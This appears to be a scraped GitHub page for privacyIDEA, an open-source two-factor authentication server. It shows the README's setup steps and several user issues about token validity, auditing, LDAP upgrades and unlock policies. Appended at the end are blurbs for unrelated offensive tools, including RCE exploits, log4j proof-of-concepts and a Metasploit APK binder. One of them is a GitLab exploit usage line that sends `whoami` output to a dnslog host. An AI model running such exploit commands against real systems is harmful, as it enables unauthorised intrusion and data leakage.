:closed_lock_with_key: multi factor authentication system (2FA, MFA, OTP Server)

Overview

privacyIDEA

Build Status https://codecov.io/gh/privacyidea/privacyidea/coverage.svg?branch=master Latest Version PyPI - Python Version License Documentation Codacy Badge

privacyIDEA on twitter

privacyIDEA is an open solution for strong two-factor authentication like OTP tokens, SMS, smartphones or SSH keys. Using privacyIDEA you can enhance your existing applications like local login (PAM, Windows Credential Provider), VPN, remote access, SSH connections, access to web sites or web portals with a second factor during authentication. Thus boosting the security of your existing applications.

Overview

privacyIDEA runs as an additional service in your network and you can connect different applications to privacyIDEA.

privacyIDEA Integration

privacyIDEA does not bind you to any decision of the authentication protocol or it does not dictate you where your user information should be stored. This is achieved by its totally modular architecture. privacyIDEA is not only open as far as its modular architecture is concerned. But privacyIDEA is completely licensed under the AGPLv3.

It supports a wide variety of authentication devices like OTP tokens (HMAC, HOTP, TOTP, OCRA, mOTP), Yubikey (HOTP, TOTP, AES), FIDO U2F, as well as FIDO2 WebAuthn devices like Yubikey and Plug-Up, smartphone Apps like Google Authenticator, FreeOTP, Token2 or TiQR, SMS, Email, SSH keys, x509 certificates and Registration Codes for easy deployment.

privacyIDEA is based on Flask and SQLAlchemy as the python backend. The web UI is based on angularJS and bootstrap. A MachineToken design lets you assign tokens to machines. Thus you can use your Yubikey to unlock LUKS, assign SSH keys to SSH servers or use Offline OTP with PAM.

You may join the discourse discussion forum to give feedback, help other users, discuss questions and ideas: https://community.privacyidea.org

Setup

For setting up the system to run it, please read install instructions at privacyidea.readthedocs.io.

If you want to setup a development environment start like this:

git clone https://github.com/privacyidea/privacyidea.git
cd privacyidea
virtualenv venv
source venv/bin/activate
pip install -r requirements.txt

You may additionally want to set up your environment for testing, by adding the additional dependencies:

pip install -r tests/requirements.txt

You may also want to read the blog post about development and debugging at https://www.privacyidea.org/privacyidea-development-howto/

Getting and updating submodules

The client-side library for the registering and signing of WebAuthn-Credentials resides in a submodule.

To fetch all submodules for this repository, run:

git submodule update --init --recursive

When pulling changes from upstream later, you can automatically update any outdated submodules, by running:

git pull --recurse-submodules

Running it

First You need to create a config-file.

Then create the database and encryption key:

./pi-manage createdb
./pi-manage create_enckey

If You want to keep the development database upgradable, You should stamp it to simplify updates:

./pi-manage db stamp head -d migrations/

Create the key for the audit log:

./pi-manage create_audit_keys

Create the first administrator:

./pi-manage admin add <username>

Run it:

./pi-manage runserver

Now you can connect to http://localhost:5000 with your browser and login as administrator.

Run tests

If you have followed the steps above to set up your environment for testing, running the test suite should be as easy as running pytest with the following options:

python -m pytest -v --cov=privacyidea --cov-report=html tests/

Contributing

There are a lot of different ways to contribute to privacyIDEA, even if you are not a developer.

If you found a security vulnerability please report it to [email protected].

You can find detailed information about contributing here: https://github.com/privacyidea/privacyidea/blob/master/CONTRIBUTING.md

Code structure

The database models are defined in models.py and tested in tests/test_db_model.py.

Based on the database models there are the libraries lib/config.py which is responsible for basic configuration in the database table config. And the library lib/resolver.py which provides functions for the database table resolver. This is tested in tests/test_lib_resolver.py.

Based on the resolver there is the library lib/realm.py which provides functions for the database table realm. Several resolvers are combined into a realm.

Based on the realm there is the library lib/user.py which provides functions for users. There is no database table user, since users are dynamically read from the user sources like SQL, LDAP, SCIM or flat files.

Versioning

privacyIDEA adheres to Semantic Versioning.

Comments
  • Validity Format

    Validity Format

    Versions

    privacyIDEA: 2.17

    Installation method:

    • from source / github

    more details:

    OS: AmazonLinux

    Webserver: nginx

    Tokendatabase: PostgreSQL

    ======

    Hi Cornelinux,

    We are seeing some issue with the Validity Period settings:

    1. WebUI format mismatch with database If you try to select a date from the calendar only, the date format string shown in the UI as a result is DD/MM/YY, and is recorded fine as DD/MM/YY in the token info (database)

    However, if you try to select a date from the calendar and then insert a time string after, the date/time format shown in the UI is DD/MM/YY hh:mm, yet is recorded as MM/DD/YY hh:mm in the token info (database)

    This is very confusing for user experience. The calendar selection format should agree with the string entering format.

    2. Timezone The time enter in the webUI is likely local time zone for the user (for example PST), but it is always converted to GMT when saved in the database. And when the user authenticate, it is matched with local time zone against the literal-saved validity time in the token info.

    For example: If the validity is entered as 08/03/17 04:43 (PST), it will be saved as 03/08/17 11:43 in the token info, and displayed in token details as so. (date and month is switched, and time is converted to GMT)

    Provided that I manually fix the date so that the token info now is 08/03/17 11:43 (GMT). When a user authenticates at 11:00 PST it is failed due to out side of validity window because it is matching against the literal 11:43 GMT in the token info.

    Because there is no timezone is shown, it is further confusing, especially for organization that has users across multiple timezones.

    I am not sure if I may be missing some configuration to adjust this issue. I am looking forward to your input!

    Thank you.

    Type: Known issue 
    opened by quynh-axiadids 23
  • Cron runner

    Cron runner

    We need to be able to define recurring tasks every minute, 5 minutes, hour...

    This can be used to

    • process statistics counters (#990)
    • rotate audit
    • clean-up user cache
    • measure other counters based on sql statements (Like count all not assigned hardware tokens #986

    Such cron definitions would consist of

    • time to repeat the task
    • condition
    • module to handle the task

    This could be implemented in a similar modular way like the event handler.

    Type: Enhancement Topic: Monitoring 
    opened by cornelinux 22
  • adding activated policies to the audit log

    adding activated policies to the audit log

    Split from #829

    I think this is also a good idea! If we do not want to change the audit table schema, we could also add a DEBUG logging output that sums up the activated policies for each request in a first step.

    On the technical side, I think we have to differentiate between pre- and postpolicies:

    I noticed that the prepolicies all return True in any case, but the return value doesn't seem to be processed. Couldn't we use the return value to indicate whether the policy was activated? The prepolicy decorator could then construct a list of activated policies in the request context (e.g. g.activated_prepolicies), i.e. a list of all policy functions that returned True. For postpolicies, it seems to be a bit harder because they return the new response. Maybe the postpolicy decorator could check whether the response was modified by the postpolicy? (e.g. if new_response != old_response or new_response.data != old_data: ...). Or we make this explicit and add a function announce_policy_activation() or something like that. We would just need to insert calls to that function at the right places.

    Type: Enhancement Topic: Audit Topic: Policy 
    opened by cornelinux 22
  • NoneType object has no attribute 'split' error while viewing user details

    NoneType object has no attribute 'split' error while viewing user details

    Since last update to version 2.15 we have seen the following notification when viewing user information:

    image

    This occurs now and then and only occurred since last update. Closing the browser and logging back on seems to resolve the issue temporary.

    opened by MaRRiK74 22
  • Add Audit Module, that does SQL Audit _and_ Audit to file

    Add Audit Module, that does SQL Audit _and_ Audit to file

    We need the possiblitiy to run audit logs to sql audit and to a file.

    We either could

    • create a new audit module, that does both, inherited from SQLAudit
    • enhance the SQLAudit module
    • or allow the audit framework to write to multiple audit modules in parallel (sqlaudit and fileaudit)
    Prio: High Type: Main feature 
    opened by cornelinux 21
  • HTTP UserId Resolver support

    HTTP UserId Resolver support

    Is your feature request related to a problem? Please describe. What are you trying to achieve?

    Currenlty, pi supports sql, ldap, passwd and scim user's resolvers. A useful case for microservices is retrieving users from an external API. For example, http://domain.com/users/<userId>

    Describe the solution you'd like A clear and concise description of what you want to happen.

    • What is the purpose of the resolver

    Use third party HTTP API for retrieving user data without follows the SCIM specs.

    • How it works

    Since PI does not store users, it uses resolvers like LDAP, SCIM, SQL, etc. Today, there is no way to resolve user information through an API but SCIM. SCIM uses an authorization server to authenticate the request, HTTP resolver will not. HTTP resolver could authenticate users via Authorization headers instead.

    • How it is configured

    The user would create an HTTP resolver only adding an HTTP endpoint under Add httpresolver UI. The endpoint must contain the '%s' symbol inside, symbol where pi will replace with their userId.

    Describe alternatives you've considered A clear and concise description of any alternative solutions or features you've considered.

    Add inversion control in order to be the user able to create custom resolvers instead of modifying pi code directly.

    Additional context Add any other context or screenshots, that might help us to better understand your idea, your need and your circumstances.

    image

    Topic: Resolver 
    opened by brunocascio 20
  • 2step enrollment with privacyidea authenticator

    2step enrollment with privacyidea authenticator

    The two step enrollment has to work with the privacyIDEA authenticator.

    See

    • https://github.com/privacyidea/privacyidea-authenticator/issues/4
    • https://github.com/privacyidea/privacyidea-authenticator/issues/5

    These things have to be done on the server side:

    1. Implement the better key generation function based of pbkdf2
    2. Create testvectors for the key generation, so that we can have tests on server side and on app side
    3. Allow to choose 2step enrolment in enrollment ui. In case of 2step enrollment the enrollment ui needs to display an entry field (for the nonce) in addition to the QR code.
    4. Add configuration option for
      • information to be put into the QR code (?pin=true, ?2step=true)
      • if at all/how and when to use 2step. So that not the admin or use can choose to enroll 2step but a policy will define this. The config options are probably best defined in an enrollment policy.
    Type: Enhancement Topic: Token Type: Main feature 
    opened by cornelinux 20
  • After upgrade there are LDAPresolver errors

    After upgrade there are LDAPresolver errors

    What did you try to do?

    I wanted to upgrade privacyIDEA from version 2.11.3 to newest 2.19 or 2.18.1 version. I did everything as written in this website: http://privacyidea.readthedocs.io/en/latest/installation/upgrade.html but after upgrading I discovered problems with ldapresolver

    What outcome did you expect?

    What do you think, how the system should have worked?

    Update should work without any problem.

    What did acutally happen?

    Users from Active directory are not able to log via VPN because of errors. The second issue is that privacyIDEA is running after update in debug mode, but in config file is still set to INFO.

    Configuration

    • privacyIDEA Version: 2.11.3 -> 2.19

    • Installation method: pip install in virtualenv

    more details:

    • OS: CentOS 7

    • Webserver: HTTPD 2.4.6-31.el7

    • Tokendatabase: 5.5.44-MariaDB

    Log file

    Update LOG update.txt Database update LOG update_db.txt privacyidea.log [2017-06-26 11:30:14,202][3303][139998652352256][ERROR][privacyidea.lib.token:424] User information can not be retrieved: 'ascii' codec can't encode character u'\u0144' in position 27: ordinal not in range(128) [2017-06-26 11:30:14,202][3303][139998652352256][ERROR][privacyidea.lib.token:424] User information can not be retrieved: 'ascii' codec can't encode character u'\u0144' in position 27: ordinal not in range(128) [2017-06-26 11:30:14,793][3303][139998652352256][ERROR][privacyidea.lib.token:424] User information can not be retrieved: 'ascii' codec can't encode character u'\u0144' in position 14: ordinal not in range(128) [2017-06-26 11:30:14,793][3303][139998652352256][ERROR][privacyidea.lib.token:424] User information can not be retrieved: 'ascii' codec can't encode character u'\u0144' in position 14: ordinal not in range(128)

    Topic: LDAP Status: Waiting for feedback 
    opened by ghost 20
  • Deterministic installations with pinned dependencies

    Deterministic installations with pinned dependencies

    Currently, this is just an idea and I would be interested in your opinions :-)

    There are currently three ways to install privacyIDEA (please correct me if I'm wrong):

    • via native distribution packages, currently only Ubuntu
    • via distribution packages using virtualenv (e.g. centos and debian-virtualenv)
    • manually in a virtualenv via pip install privacyidea

    In the past, we often had problems when there were new versions of dependencies which were incompatible with our codebase (e.g. ldap3/pyasn #912).

    This can still happen, e.g. assume there is a dependency X which releases a new version 1.1 today that is incompatible with privacyIDEA 2.22. Then, all users who use pip install privacyidea today to install privacyIDEA 2.22 will get the newest version 1.1 of dependency X, which will cause problems, and will need to manually downgrade X to get a working installation. We can react by putting X<1.1 in our setup.py, but this requires us to make a new release.

    In case of Ubuntu packages, the package repositories don't get updated too often, so the risk of incompatible new versions is pretty low here. The risk is higher for virtualenv packages and pip installations, because privacyidea-pip-update will upgrade all installed dependencies to their latest versions by default (though we can still explicitly exclude versions in setup.py).

    So it might be nice to have "deterministic" installations in the sense that all versions of dependencies installed on user's machines are pinned and known to work with our current stable version.

    Currently, I'm not sure how to do that nicely: Putting pinned dependencies in setup.py is discouraged. requirements.txt contains pinned versions, but pip install privacyidea installs dependencies from setup.py, not requirement.txt.

    What do you think? :)

    Type: Idea! 
    opened by fredreichbier 19
  • Policies could be dependent on any user attribute

    Policies could be dependent on any user attribute

    The conditions for a policy and event handler to apply could depend on any arbitrary user attribute (like a group membership)

    See https://community.privacyidea.org/t/resolver-and-user-token-relation/941

    Type: Idea! Prio: High Topic: Policy Type: Main feature 
    opened by cornelinux 18
  • Statistics and dashboard

    Statistics and dashboard

    Use RRDTool for data in time series.

    https://oss.oetiker.ch/rrdtool/prog/rrdpython.en.html

    We can do timeseries over:

    • successfull authentications (all or per user, serial, resolver, realm)
    • failed authentications (all or per user, serial, resolver, realm)
    • API calls (all or per user)
    • users, who issued calls
    • ...
    Layer: UI Topic: Monitoring 
    opened by cornelinux 17
  • Update to 3.8 fails with `relation

    Update to 3.8 fails with `relation "customuserattribute_seq" already exists`

    Top-level intent

    I tried to upgrade my PI instance from 3.7.4 to 3.8.

    Steps to reproduce

    1. Install PI at version 3.7.4
    2. Update to 3.8
    3. Run pi-manage db upgrade

    Expected outcome

    Upgrade working fine without any issues.

    Actual outcome

    DB migration failed like this:

    (psycopg2.errors.DuplicateTable) relation "customuserattribute_seq" already exists
    

    Context

    This was probably introduced by #3384 which also creates the db sequence customuserattribute_seq even though the corresponding data-structures seem to exist since 3.6 which seems questionable on its own already.

    I just installed another instance of PrivacyIDEA at version 3.7.4 and on that instance the sequence customuserattribute_seq also existed already, so updating this test instance to 3.8 would cause the same problem.

    Configuration

    • privacyIDEA version: 3.7.4, issue occurred while upgrading to 3.8
    • Installation method: NixOS module (services.privacyidea
    • Python version: 3.9.16
    • Operating system: NixOS
    • Webserver: nginx
    • Token database: PostgreSQL 13.9

    Log file

    n/a

    Type: Possible bug 
    opened by Ma27 0
  • 2 possible image fields in the challenge

    2 possible image fields in the challenge

    Hi,

    as I see, the server response has 2 image fields. One is called image (new, to show the QR Code) and another called img, which can contain any image assigned to the given challenge.

    Can you consider using only one field for both of these? That will make our work easier and cleaner. And though, by token enrollment, we don't need to show any other image than this QR Code. E.g.: if "qrcode" is not empty -> replace the "img"

    Or maybe I miss something?

    Type: Possible bug 
    opened by lukasmatusiewicz 0
  • Do not require second factor when unlocking system for certain amount of time after having used it last

    Do not require second factor when unlocking system for certain amount of time after having used it last

    We'd like to introduce PrivacyIdea in our environment, mainly to secure local Windows logins, but during brainstorming people quickly raised the issue that they'd get very annoyed with it if they had to enter their second factor every time they unlock their computer.

    We've got a system policy set that locks a computer after X number of minutes of inactivity, and because of that a bunch of people would be forced to enter not only their password, but also their second factor multiple times per day. We do not want to disable the second factor for unlocking the system entirely though. We just want it to not be required every time the system is unlocked.

    Our idea to combat this was to basically set things up in a way that will make the second factor absolutely mandatory if the system has been (these rules beat any others):

    • just booted
    • woken from standby (suspend to ram)
    • woken from hibernation (suspend to disk)

    However, if the system was only locked then the client should NOT require the second factor if the following condition is met:

    • the user is just unlocking the system within XX minutes after having last used the second factor for login (or unlocking if XX had already expired before; we considered a value of something like 4 hours for XX; though obviously that should be configurable)

    Further, the system should fall back to requiring the second factor under certain circumstances even if XX has not expired yet:

    • If the system has been locked more than XY times in the last XZ minutes (our default was 10 times in 1 hour; both values should be configurable)
    • If the user has entered a wrong password YY times while trying to unlock the system with the second factor disabled (our default value here was 3; again should be configurable)

    I've got the whole ruleset written down as a Powershell script that gets executed by a scheduled tasks triggered on a number of eventlog IDs from the system and security eventlogs. Following the rules outlined above the script then modifies the "cpus_logon" and "cpus_unlock" registry keys to either enable or disable the second factor requirement. It also keeps track (in the registry) of when the second factor was last used (to calculate when XX has expired), when it was locked (MultiString with a list of timestamps) and number of unlocks to calculate when XY in XZ is exceeded, and obviously number of failed unlocks to reenable the second factor again after YY is exceeded.

    The whole thing works but it adds an additional level of complexity I'd rather avoid if possible. However, we feel it is necessary to add such a feature to get not only our users but also management and VIPs on board with introducing PrivacyIDEA in our environment.

    Instead of having a custom Powershell script trigger on eventlog entries I'd much rather have the client natively support all these features and pull the configured values (XX, XY, XZ and YY) from a central configuration point allowing us to easily change and adjust values.

    Is this something you could/would consider to implement? Would be very much appreciated and surely very useful not only to us but others as well. On top of that it would add a nice feature to the list that other competitors in this field might not have and set PrivacyIDEA apart in that regard.

    Type: Feature request 
    opened by kheldorn 1
  • Send correct QR-code image to client

    Send correct QR-code image to client

    The QR-code sent to the client after enrollment during validate/check was incorrect, it just contained the token secret without the necessary HOTP/TOTP parameter.

    opened by plettich 1
Releases(v3.8)
SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

Bad Blood Bad Blood is an exploit for CVE-2021-20038, a stack-based buffer overflow in the httpd binary of SMA-100 series systems using firmware versi

Jake Baines 80 Dec 29, 2022
The ultimate Metasploit apk binder with legit apk written in python3

Infector is a python3 based script which is officially made for linux based distro . It binds metasploit payload with original apk with avast antivirus bypassed .

27 Dec 25, 2022
CVE-2021-22205 Unauthorized RCE

CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog

r0eXpeR 70 Nov 09, 2022
GitLab CI security tools runner

Common Security Pipeline Описание проекта: Данный проект является вариантом реализации DevSecOps практик, на базе: GitLab DefectDojo OpenSouce tools g

Сити-Мобил 14 Dec 23, 2022
A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.

A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regardin

Cycurity 39 Dec 10, 2022
A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps

boring-flutter A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps. Currently only supporting

Hamza 64 Oct 18, 2022
Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)

Pachine Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation). Installtion $ pip3 install impacket Usage Impacket v0.9.23 -

Oliver Lyak 250 Dec 31, 2022
zip-brute Zip File Password Cracking with Using Password List

Zip brute is a python script that cracks zip that are password protected using a wordlist dictionary.

AnonyminHack5 13 Nov 03, 2022
A proxy server application written in python for trial purposes

python-proxy-server This is a proxy server ❤️ application written in python ❤️ for trial purposes. The purpose of the application; Connecting to Hacke

Ali Kasimoglu 2 Dec 27, 2021
This tool allows to automatically test for Content Security Policy bypass payloads.

CSPass This tool allows to automatically test for Content Security Policy bypass payloads. Usage [cspass]$ ./cspass.py -h usage: cspass.py [-h] [--no-

Ruulian 30 Nov 22, 2022
The next level Python obfuscator, nearly impossible to deobfuscate.

🐸 Kramer 🐸 Kramer is a next level obfuscation tool written in Python3 allowing you to obfuscate your Python3 code easily and securely. It uses Berse

Billy 114 Dec 26, 2022
A simple linux keylogger project.

The project This project is a simple linux keylogger. When activated, it registers all the actions made with the keyboard. The log files are registere

1 Oct 24, 2021
Having a weak password is not good for a system that demands high confidentiality and security of user credentials

Having a weak password is not good for a system that demands high confidentiality and security of user credentials. It turns out that people find it difficult to make up a strong password that is str

PyLaboratory 0 Feb 07, 2022
Linus-png.github.io - Versionsverwaltung & Open Source Hausaufgabe

Let's Git - Versionsverwaltung & Open Source Hausaufgabe Herzlich Willkommen zu

1 Jan 24, 2022
Obfuscate ip address using different encodings

ipobfuscator How it works? Single ip address can be written in multiple ways. The most popular way is to represent ip as 4 octets separated with dots.

Piotr Warmke 1 Nov 02, 2021
This repository is one of a few malware collections on the GitHub.

This repository is one of a few malware collections on the GitHub.

Andrew 1.7k Dec 28, 2022
Log4j command generator: Generate commands for CVE-2021-44228

Log4j command generator Generate commands for CVE-2021-44228. Description The vulnerability exists due to the Log4j processor's handling of log messag

1 Jan 03, 2022
A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. Recently there was a new vulnerability in log4j, a java loggin

koz 1.5k Jan 04, 2023
Small Python library that adds password hashing methods to ORM objects

Password Mixin Mixin that adds some useful methods to ORM objects Compatible with Python 3.5 = 3.9 Install pip install password-mixin Setup first cre

Joe Gasewicz 5 Nov 22, 2022
Brute-forcing (or not!) deck builder for Pokemon Trading Card Game.

PokeBot Deck Builder Brute-forcing (or not!) deck builder for Pokemon Trading Card Game. Warning: intensely not optimized and spaghetti coded Credits

Hocky Harijanto 0 Jan 10, 2022